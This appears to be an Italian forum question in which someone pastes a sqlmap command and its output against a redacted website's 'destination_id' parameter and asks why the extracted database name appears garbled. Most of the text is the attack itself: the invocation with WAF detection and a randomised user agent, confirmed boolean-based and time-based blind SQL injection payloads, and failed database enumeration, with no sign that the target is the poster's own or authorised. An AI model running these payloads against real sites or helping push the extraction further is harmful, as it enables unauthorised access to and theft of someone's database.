Ho i risultati per sqlmap:
./sqlmap.py -u "http://REDACTED/browse?destination_id=12" --identify-waf --random-agent -v 3 --dbs
GET parameter 'destination_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: destination_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: destination_id=12) AND 2321=2321 AND (9943=9943
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: destination_id=12) AND SLEEP(5) AND (4055=4055
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
Ma quando ottieni i risultati del nome del database, tutto è criptato:
[10:26:50] [ERROR] unable to retrieve the number of databases
[10:26:50] [INFO] falling back to current database
[10:26:50] [INFO] fetching current database
[10:26:50] [INFO] resumed: \x11
[10:26:50] [DEBUG] performed 0 queries in 0.00 seconds
available databases [1]:
[*]
Nei database disponibili mostra solo un quadrato con 0011 in esso.
Quali sono i tuoi pensieri?